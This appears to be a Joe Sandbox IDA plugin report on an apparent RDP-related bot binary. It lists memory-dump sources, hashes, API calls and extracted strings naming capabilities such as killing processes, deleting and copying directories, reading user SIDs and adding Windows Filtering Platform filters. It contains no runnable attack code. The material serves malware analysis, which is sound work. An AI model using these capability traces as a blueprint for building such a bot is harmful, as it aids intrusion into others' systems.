                                                                                                                  • Associated: 00000005.00000002.1755047466.00007FF64B94C000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                                  • Associated: 00000005.00000002.1755066070.00007FF64B94F000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_5_2_7ff64b930000_cwjk513wjc7a1mlgh3.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: ErrorLast$Resource$FindLoadfflushfwrite
                                                                                                                  • String ID: (hnd != NULL)$(out != NULL)$C:/Projects/rdp/bot/codebase/module.c$[E] (%s) -> Assertation failed: %s, file %s, line %d$[E] (%s) -> FindResourceA failed(hnd=0x%p,gle=%lu)$[E] (%s) -> LoadResource failed(hnd=0x%p,gle=%lu)$[I] (%s) -> Done(hnd=0x%p,dwSignature=%08lx,dwStrucVersion=%08lx,dwFileVersionMS=%08lx,dwFileVersionLS=%08lx,dwProductVersionMS=%08lx,dwProductVersionLS=%08lx,dwFileFlagsMask=%08lx,dwFileFlags=%08lx,dwFileOS=%08lx,dwFileType=%08lx,dwFileSubtype=%08lx,dwFileDat$module_get_version
                                                                                                                  • API String ID: 2123903355-2019010457
                                                                                                                  • Opcode ID: bebd427b92f1e5c21e62c97bedb703bb783ca4cbadeeb975c81eb13876ce5c63
                                                                                                                  • Instruction ID: 997cc65ac7e915e91feffd578121dea1cbb7350ab18a57e1e50d9dd5c46681aa
                                                                                                                  • Opcode Fuzzy Hash: bebd427b92f1e5c21e62c97bedb703bb783ca4cbadeeb975c81eb13876ce5c63
                                                                                                                  • Instruction Fuzzy Hash: EF410C71A1C6568AEB54FF68E44056977A0FB4E754F101135EA6CC3AB6EF3CE544CB00
                                                                                                                  APIs
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000005.00000002.1754943118.00007FF64B931000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF64B930000, based on PE: true
                                                                                                                  • Associated: 00000005.00000002.1754924040.00007FF64B930000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                  • Associated: 00000005.00000002.1754977678.00007FF64B941000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                  • Associated: 00000005.00000002.1754997476.00007FF64B942000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                  • Associated: 00000005.00000002.1755019915.00007FF64B94A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                  • Associated: 00000005.00000002.1755047466.00007FF64B94C000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                                  • Associated: 00000005.00000002.1755066070.00007FF64B94F000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_5_2_7ff64b930000_cwjk513wjc7a1mlgh3.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: AddressProc$HandleLibraryLoadModule
                                                                                                                  • String ID: SystemFunction036$advapi32.dll$msvcrt.dll$rand_s
                                                                                                                  • API String ID: 384173800-4041758303
                                                                                                                  • Opcode ID: 85c771fb55e45746b373319f0909d9bbab80cd8ba9edf7ac40692cd287980bbc
                                                                                                                  • Instruction ID: 45ecdd4b403c5070a8175bef2eb42cb518d0f0ec24ba8539d7694c9cc3234a65
                                                                                                                  • Opcode Fuzzy Hash: 85c771fb55e45746b373319f0909d9bbab80cd8ba9edf7ac40692cd287980bbc
                                                                                                                  • Instruction Fuzzy Hash: 2BF0DF60E1EA1B90EE05FB12FC500A477A4BF0E794B841172C82DC2332EFACA15AC700
                                                                                                                  APIs
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000005.00000002.1754943118.00007FF64B931000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF64B930000, based on PE: true
                                                                                                                  • Associated: 00000005.00000002.1754924040.00007FF64B930000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                  • Associated: 00000005.00000002.1754977678.00007FF64B941000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                  • Associated: 00000005.00000002.1754997476.00007FF64B942000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                  • Associated: 00000005.00000002.1755019915.00007FF64B94A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                  • Associated: 00000005.00000002.1755047466.00007FF64B94C000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                                  • Associated: 00000005.00000002.1755066070.00007FF64B94F000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_5_2_7ff64b930000_cwjk513wjc7a1mlgh3.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: fflushfwriteinet_addrntohl
                                                                                                                  • String ID: 3L$TL$[E] (%s) -> FwpmFilterAdd0(IPv4) failed(filt_idx=%d,res=%08lx)$[E] (%s) -> FwpmFilterDeleteByKey0(IPv4) failed(res=%08lx)$setup_ip4_filt
                                                                                                                  • API String ID: 3255839625-58178811
                                                                                                                  • Opcode ID: d256b7c3bfc4f1f46297c99cf1b9fdebdcffbd4f8ce2096f4faa639793330bd3
                                                                                                                  • Instruction ID: 93a6dadb35d200c1c3b49fbf910e01f0cc186cf222d4870eb55909bba1990eb9
                                                                                                                  • Opcode Fuzzy Hash: d256b7c3bfc4f1f46297c99cf1b9fdebdcffbd4f8ce2096f4faa639793330bd3
                                                                                                                  • Instruction Fuzzy Hash: D1517E3260CBC585E771AB28F4403DE76A5EB99784F405128D6CD8BBAAEF3DC185CB40
                                                                                                                  APIs
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000005.00000002.1754943118.00007FF64B931000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF64B930000, based on PE: true
                                                                                                                  • Associated: 00000005.00000002.1754924040.00007FF64B930000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                  • Associated: 00000005.00000002.1754977678.00007FF64B941000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                  • Associated: 00000005.00000002.1754997476.00007FF64B942000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                  • Associated: 00000005.00000002.1755019915.00007FF64B94A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                  • Associated: 00000005.00000002.1755047466.00007FF64B94C000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                                  • Associated: 00000005.00000002.1755066070.00007FF64B94F000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_5_2_7ff64b930000_cwjk513wjc7a1mlgh3.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: Time$FileSystem
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 2086374402-0
                                                                                                                  • Opcode ID: eaf35cacb86d4e2f88e6fced642b51b1d7c27793e30891e7df17b252400794d8
                                                                                                                  • Instruction ID: 66b0dd0c70f5acff8e73925c27580a681638932146654e08331eeda47b9b4b79
                                                                                                                  • Opcode Fuzzy Hash: eaf35cacb86d4e2f88e6fced642b51b1d7c27793e30891e7df17b252400794d8
                                                                                                                  • Instruction Fuzzy Hash: 0DE022A272C90583EF20E609E0407BBA351C79C384F605030E95DC3B64DE2CD9428B40
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000005.00000002.1755019915.00007FF64B94A000.00000004.00000001.01000000.00000004.sdmp, Offset: 00007FF64B930000, based on PE: true
                                                                                                                  • Associated: 00000005.00000002.1754924040.00007FF64B930000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                  • Associated: 00000005.00000002.1754943118.00007FF64B931000.00000020.00000001.01000000.00000004.sdmpDownload File
                                                                                                                  • Associated: 00000005.00000002.1754977678.00007FF64B941000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                  • Associated: 00000005.00000002.1754997476.00007FF64B942000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                  • Associated: 00000005.00000002.1755047466.00007FF64B94C000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                                  • Associated: 00000005.00000002.1755066070.00007FF64B94F000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_5_2_7ff64b930000_cwjk513wjc7a1mlgh3.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID:
                                                                                                                  • API String ID:
                                                                                                                  • Opcode ID: b903c808809adb16dfa016090dfacf5a5f100b12dc606a88c025edecc6fee081
                                                                                                                  • Instruction ID: 86d99a35d9882cb22a8ae487ed20492448cb6e51437b6ed9da65aed3a47c4870
                                                                                                                  • Opcode Fuzzy Hash: b903c808809adb16dfa016090dfacf5a5f100b12dc606a88c025edecc6fee081
                                                                                                                  • Instruction Fuzzy Hash: 9631D49BE4DAD189E25276244C791643F91ABABB3174D807ECE58C3AF3AD0E2C068301
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000005.00000002.1754943118.00007FF64B931000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF64B930000, based on PE: true
                                                                                                                  • Associated: 00000005.00000002.1754924040.00007FF64B930000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                  • Associated: 00000005.00000002.1754977678.00007FF64B941000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                  • Associated: 00000005.00000002.1754997476.00007FF64B942000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                  • Associated: 00000005.00000002.1755019915.00007FF64B94A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                  • Associated: 00000005.00000002.1755047466.00007FF64B94C000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                                  • Associated: 00000005.00000002.1755066070.00007FF64B94F000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_5_2_7ff64b930000_cwjk513wjc7a1mlgh3.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID:
                                                                                                                  • API String ID:
                                                                                                                  • Opcode ID: ad621d27ed11d527f0a4eb9abd0c574f9942df0d3b361b300398ff936c25c339
                                                                                                                  • Instruction ID: 47ec45e549eaac06a6c1bda03fe790d1ac85ed07ebf01fe6a75a27def22dfbbe
                                                                                                                  • Opcode Fuzzy Hash: ad621d27ed11d527f0a4eb9abd0c574f9942df0d3b361b300398ff936c25c339
                                                                                                                  • Instruction Fuzzy Hash: D8A0021294DC09C4E6402F10EC012717528EB0F710F842230C038D20668F2C90008104
                                                                                                                  APIs
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000005.00000002.1754943118.00007FF64B931000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF64B930000, based on PE: true
                                                                                                                  • Associated: 00000005.00000002.1754924040.00007FF64B930000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                  • Associated: 00000005.00000002.1754977678.00007FF64B941000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                  • Associated: 00000005.00000002.1754997476.00007FF64B942000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                  • Associated: 00000005.00000002.1755019915.00007FF64B94A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                  • Associated: 00000005.00000002.1755047466.00007FF64B94C000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                                  • Associated: 00000005.00000002.1755066070.00007FF64B94F000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_5_2_7ff64b930000_cwjk513wjc7a1mlgh3.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: ErrorLast$Process$CloseCreateFirstHandleOpenProcess32SnapshotTerminateToolhelp32strcmp
                                                                                                                  • String ID: $ $ $ $(name != NULL) || (pid != 0)$C:/Projects/rdp/bot/codebase/process.c$NULL$P$P$P$P$[E] (%s) -> Assertation failed: %s, file %s, line %d$[E] (%s) -> CreateToolhelp32Snapshot failed(gle=%lu)$[E] (%s) -> Failed(name=%s,pid=%lu,err=%08x)$[E] (%s) -> OpenProcess failed(gle=%lu)$[E] (%s) -> Process32First failed(gle=%lu)$[E] (%s) -> Process32Next failed(gle=%lu)$[E] (%s) -> TerminateProcess failed(gle=%lu)$[I] (%s) -> Done(name=%s,pid=%lu)$process_kill$|$~$~$~$~
                                                                                                                  • API String ID: 3326156344-4160762685
                                                                                                                  • Opcode ID: ddae266145e06ba45a32dd147251454c87ade30978731ea112754126fa238577
                                                                                                                  • Instruction ID: ff944f830d5ad6cfeff51aeb28ad1557ba5eb7c3d0debdc5eae6abd5c87d61eb
                                                                                                                  • Opcode Fuzzy Hash: ddae266145e06ba45a32dd147251454c87ade30978731ea112754126fa238577
                                                                                                                  • Instruction Fuzzy Hash: 67F1F711E1C60382FFACB755E8843793250AF1F755E206132CA1ECAAF3DE5EBD859242
                                                                                                                  APIs
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000005.00000002.1754943118.00007FF64B931000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF64B930000, based on PE: true
                                                                                                                  • Associated: 00000005.00000002.1754924040.00007FF64B930000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                  • Associated: 00000005.00000002.1754977678.00007FF64B941000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                  • Associated: 00000005.00000002.1754997476.00007FF64B942000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                  • Associated: 00000005.00000002.1755019915.00007FF64B94A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                  • Associated: 00000005.00000002.1755047466.00007FF64B94C000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                                  • Associated: 00000005.00000002.1755066070.00007FF64B94F000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_5_2_7ff64b930000_cwjk513wjc7a1mlgh3.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: strlen$DirectoryErrorLastRemovestrcmpstrcpy$fflushfwrite
                                                                                                                  • String ID: (path != NULL)$*$C:/Projects/rdp/bot/codebase/fs.c$NULL$[D] (%s) -> Delete(path_wc=%s,f_path=%s)$[E] (%s) -> Assertation failed: %s, file %s, line %d$[E] (%s) -> Failed(path=%s,recursive=%d,err=%08x)$[E] (%s) -> RemoveDirectoryA failed(path=%s,recursive=%d,gle=%lu)$[I] (%s) -> Done(path=%s,recursive=%d)$fs_dir_delete
                                                                                                                  • API String ID: 2460052984-4087913290
                                                                                                                  • Opcode ID: f49021cfd17e5645a415218e2337d23fcbe7ef664cc3b0d8083bd933364814f5
                                                                                                                  • Instruction ID: dd83f5e299f43626d8e426802168505261bfbd4dd9e01ea9f7992c1bd7375c55
                                                                                                                  • Opcode Fuzzy Hash: f49021cfd17e5645a415218e2337d23fcbe7ef664cc3b0d8083bd933364814f5
                                                                                                                  • Instruction Fuzzy Hash: 20A1AE22A0C68295FB70BB59E4143BA6391EF8F345FA46032D94DC6AB7EE3DE4458701
                                                                                                                  APIs
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000005.00000002.1754943118.00007FF64B931000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF64B930000, based on PE: true
                                                                                                                  • Associated: 00000005.00000002.1754924040.00007FF64B930000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                  • Associated: 00000005.00000002.1754977678.00007FF64B941000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                  • Associated: 00000005.00000002.1754997476.00007FF64B942000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                  • Associated: 00000005.00000002.1755019915.00007FF64B94A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                  • Associated: 00000005.00000002.1755047466.00007FF64B94C000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                                  • Associated: 00000005.00000002.1755066070.00007FF64B94F000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_5_2_7ff64b930000_cwjk513wjc7a1mlgh3.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: strlen$strcatstrcpy$strcmp
                                                                                                                  • String ID: (dst != NULL)$(src != NULL)$*$C:/Projects/rdp/bot/codebase/fs.c$NULL$[D] (%s) -> Copy(f_src=%s,f_dst=%s)$[E] (%s) -> Assertation failed: %s, file %s, line %d$[E] (%s) -> Failed(src=%s,dst=%s,err=%08x)$[I] (%s) -> Done(src=%s,dst=%s)$[I] (%s) -> Filtered(f_src=%s,flt=%s)$fs_dir_copy$|
                                                                                                                  • API String ID: 2140730755-3699962909
                                                                                                                  • Opcode ID: 53b4bd48d3555066442ddf4302ded71f9d2e6007b6eed7bc00e144543ebe8498
                                                                                                                  • Instruction ID: 2774a0f1b021e1589372ad748b0b7590e1f575f319b9f20c44fbc5dc3922a1c4
                                                                                                                  • Opcode Fuzzy Hash: 53b4bd48d3555066442ddf4302ded71f9d2e6007b6eed7bc00e144543ebe8498
                                                                                                                  • Instruction Fuzzy Hash: 9AC1A061A0C68291FAA0BB15E5443FA6351EF4E788F846032DA5DC7AABDF7CE505CB01
                                                                                                                  APIs
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000005.00000002.1754943118.00007FF64B931000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF64B930000, based on PE: true
                                                                                                                  • Associated: 00000005.00000002.1754924040.00007FF64B930000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                  • Associated: 00000005.00000002.1754977678.00007FF64B941000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                  • Associated: 00000005.00000002.1754997476.00007FF64B942000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                  • Associated: 00000005.00000002.1755019915.00007FF64B94A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                  • Associated: 00000005.00000002.1755047466.00007FF64B94C000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                                  • Associated: 00000005.00000002.1755066070.00007FF64B94F000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_5_2_7ff64b930000_cwjk513wjc7a1mlgh3.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: ErrorLastLocalToken$AllocInformation$CloseFreeHandleLengthOpenProcessfflushfwritememcpy
                                                                                                                  • String ID: (hnd != NULL)$(sid != NULL)$C:/Projects/rdp/bot/codebase/process.c$[E] (%s) -> Assertation failed: %s, file %s, line %d$[E] (%s) -> Failed(hnd=0x%p,err=%08x)$[E] (%s) -> GetTokenInformation failed(hnd=0x%p,gle=%lu)$[E] (%s) -> OpenProcessToken failed(hnd=0x%p,gle=%lu)$process_get_user_sid
                                                                                                                  • API String ID: 3826151639-1775164968
                                                                                                                  • Opcode ID: a6c61a1b07e674b01c5ec014d58fb88dea4969261ebe8cbd2533bfbf6d8bc1e9
                                                                                                                  • Instruction ID: d2bc21bd824a139ac0e3106b356712f1b70e60d0c3ad340245c09231b63df914
                                                                                                                  • Opcode Fuzzy Hash: a6c61a1b07e674b01c5ec014d58fb88dea4969261ebe8cbd2533bfbf6d8bc1e9
                                                                                                                  • Instruction Fuzzy Hash: F7915B22E0C51281FB74BB14E8507B92652AF8F795F692032D91EC7AB3DE3DEC958341
                                                                                                                  APIs
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000005.00000002.1754943118.00007FF64B931000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF64B930000, based on PE: true
                                                                                                                  • Associated: 00000005.00000002.1754924040.00007FF64B930000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                  • Associated: 00000005.00000002.1754977678.00007FF64B941000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                  • Associated: 00000005.00000002.1754997476.00007FF64B942000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                  • Associated: 00000005.00000002.1755019915.00007FF64B94A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                  • Associated: 00000005.00000002.1755047466.00007FF64B94C000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                                  • Associated: 00000005.00000002.1755066070.00007FF64B94F000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_5_2_7ff64b930000_cwjk513wjc7a1mlgh3.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: FilterFwpmHeap$Add0DeleteKey0Process$AllocFreefflushfwrite
                                                                                                                  • String ID: 3L$;9rJ$TL$TL$[E] (%s) -> FwpmFilterAdd0(IPv4) failed(res=%08lx)$[E] (%s) -> FwpmFilterAdd0(IPv6) failed(res=%08lx)$[E] (%s) -> FwpmFilterDeleteByKey0(IPv4) failed(res=%08lx)$[E] (%s) -> FwpmFilterDeleteByKey0(IPv6) failed(res=%08lx)$[E] (%s) -> Memory allocation failed(size=%llu)$mem_alloc$setup_svc_filt
                                                                                                                  • API String ID: 3629392964-1470975255
                                                                                                                  • Opcode ID: 97da833c0286c23491248727b5f9ff6699206188f68b1a177a93830b109ce109
                                                                                                                  • Instruction ID: 3ac005ecd54b2e34db4059c14e0f7945269b6a8d63bd33b5c278887d2071b1a1
                                                                                                                  • Opcode Fuzzy Hash: 97da833c0286c23491248727b5f9ff6699206188f68b1a177a93830b109ce109
                                                                                                                  • Instruction Fuzzy Hash: 19A1A42260D7C285E761AB15F8407AE77A1FB9A794F045134EACC87BAADF3DC484CB40
                                                                                                                  APIs
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000005.00000002.1754943118.00007FF64B931000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF64B930000, based on PE: true
                                                                                                                  • Associated: 00000005.00000002.1754924040.00007FF64B930000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                  • Associated: 00000005.00000002.1754977678.00007FF64B941000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                  • Associated: 00000005.00000002.1754997476.00007FF64B942000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                  • Associated: 00000005.00000002.1755019915.00007FF64B94A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                  • Associated: 00000005.00000002.1755047466.00007FF64B94C000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                                  • Associated: 00000005.00000002.1755066070.00007FF64B94F000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_5_2_7ff64b930000_cwjk513wjc7a1mlgh3.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: FilterFwpmHeap$Add0DeleteFreeKey0Process$AttributesFilewcslen
                                                                                                                  • String ID: 3L$;9rJ$TL$TL$[E] (%s) -> FwpmFilterAdd0(IPv4) failed(res=%08lx)$[E] (%s) -> FwpmFilterAdd0(IPv6) failed(res=%08lx)$[E] (%s) -> FwpmFilterDeleteByKey0(IPv4) failed(res=%08lx)$[E] (%s) -> FwpmFilterDeleteByKey0(IPv6) failed(res=%08lx)$setup_app_filt
                                                                                                                  • API String ID: 2990311666-1793103013
                                                                                                                  • Opcode ID: 2c997fc73ab919394416098a8c18d9cb1dd8f1079b30a699f2a821e8dd8f435d
                                                                                                                  • Instruction ID: 57c8fe7d64c5828dad63684e9e2b4bfeebcfd3f2bc1d6b228dc5dc41a9b5e1cb
                                                                                                                  • Opcode Fuzzy Hash: 2c997fc73ab919394416098a8c18d9cb1dd8f1079b30a699f2a821e8dd8f435d
                                                                                                                  • Instruction Fuzzy Hash: BA91852160D7C295E761EB25E48039EB7A1EB9A750F145134EACC87FAAEF3DC545CB00
                                                                                                                  APIs
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000005.00000002.1754943118.00007FF64B931000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF64B930000, based on PE: true
                                                                                                                  • Associated: 00000005.00000002.1754924040.00007FF64B930000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                  • Associated: 00000005.00000002.1754977678.00007FF64B941000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                  • Associated: 00000005.00000002.1754997476.00007FF64B942000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                  • Associated: 00000005.00000002.1755019915.00007FF64B94A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                  • Associated: 00000005.00000002.1755047466.00007FF64B94C000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                                  • Associated: 00000005.00000002.1755066070.00007FF64B94F000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_5_2_7ff64b930000_cwjk513wjc7a1mlgh3.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: strlen$CreateDirectoryErrorLast$strcpy
                                                                                                                  • String ID: (path != NULL)$C:/Projects/rdp/bot/codebase/fs.c$NULL$[E] (%s) -> Assertation failed: %s, file %s, line %d$[E] (%s) -> CreateDirectoryA failed(path=%s,recursive=%d,gle=%lu)$[E] (%s) -> CreateDirectoryA failed(path=%s,recursive=%d,ptr=%s,gle=%lu)$[E] (%s) -> Failed(path=%s,recursive=%d,err=%08x)$[I] (%s) -> Done(path=%s,recursive=%d)$fs_dir_create
                                                                                                                  • API String ID: 1104438493-1059260517
                                                                                                                  • Opcode ID: 8777b3765a0b61160c2dd5586f2618d65661b4ac38adbf88f21a5bf13e2edb7f
                                                                                                                  • Instruction ID: 4bac61698f9f3b653443db5345e808f8ecaa126bebb7d96d2030a2ecd4d2c5cc
                                                                                                                  • Opcode Fuzzy Hash: 8777b3765a0b61160c2dd5586f2618d65661b4ac38adbf88f21a5bf13e2edb7f
                                                                                                                  • Instruction Fuzzy Hash: A2718A21B0C64392FB607BA9E8847B91391AF5E748F162132D95ED7BB7DE2CE845C301
                                                                                                                  APIs
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000005.00000002.1754943118.00007FF64B931000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF64B930000, based on PE: true
                                                                                                                  • Associated: 00000005.00000002.1754924040.00007FF64B930000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                  • Associated: 00000005.00000002.1754977678.00007FF64B941000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                  • Associated: 00000005.00000002.1754997476.00007FF64B942000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                  • Associated: 00000005.00000002.1755019915.00007FF64B94A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                  • Associated: 00000005.00000002.1755047466.00007FF64B94C000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                                  • Associated: 00000005.00000002.1755066070.00007FF64B94F000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_5_2_7ff64b930000_cwjk513wjc7a1mlgh3.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: ErrorLastProcess$CloseCodeExitHandle$ObjectSingleTerminateWait
                                                                                                                  • String ID: (pi != NULL)$C:/Projects/rdp/bot/codebase/process.c$[E] (%s) -> Assertation failed: %s, file %s, line %d$[E] (%s) -> Failed(pid=%lu,err=%08x)$[E] (%s) -> GetExitCodeProcess failed(pid=%lugle=%lu)$[E] (%s) -> TerminateProcess failed(pid=%lugle=%lu)$[I] (%s) -> Done(pid=%lu,exit_code=%08lx)$[W] (%s) -> GetExitCodeProcess failed(pid=%lugle=%lu)$process_close
                                                                                                                  • API String ID: 1879646588-710610406
                                                                                                                  • Opcode ID: 1ab2c9bf8f2caa541bedd61938cb30dfc0d099194f247efb2808cbd3032f71e4
                                                                                                                  • Instruction ID: 474bbf4bf8b346c0c43eb6538972fe8f174545b16db790e8578cf70062169cfa
                                                                                                                  • Opcode Fuzzy Hash: 1ab2c9bf8f2caa541bedd61938cb30dfc0d099194f247efb2808cbd3032f71e4
                                                                                                                  • Instruction Fuzzy Hash: 39813E62E4C52782FBA1BB15E4443786360AF0E754F156172CC6FD7AB7DE2CAC858382
                                                                                                                  APIs
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000005.00000002.1754943118.00007FF64B931000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF64B930000, based on PE: true
                                                                                                                  • Associated: 00000005.00000002.1754924040.00007FF64B930000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                  • Associated: 00000005.00000002.1754977678.00007FF64B941000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                  • Associated: 00000005.00000002.1754997476.00007FF64B942000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                  • Associated: 00000005.00000002.1755019915.00007FF64B94A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                  • Associated: 00000005.00000002.1755047466.00007FF64B94C000.00000008.00000001.01000000.00000004.sdmpDownload File
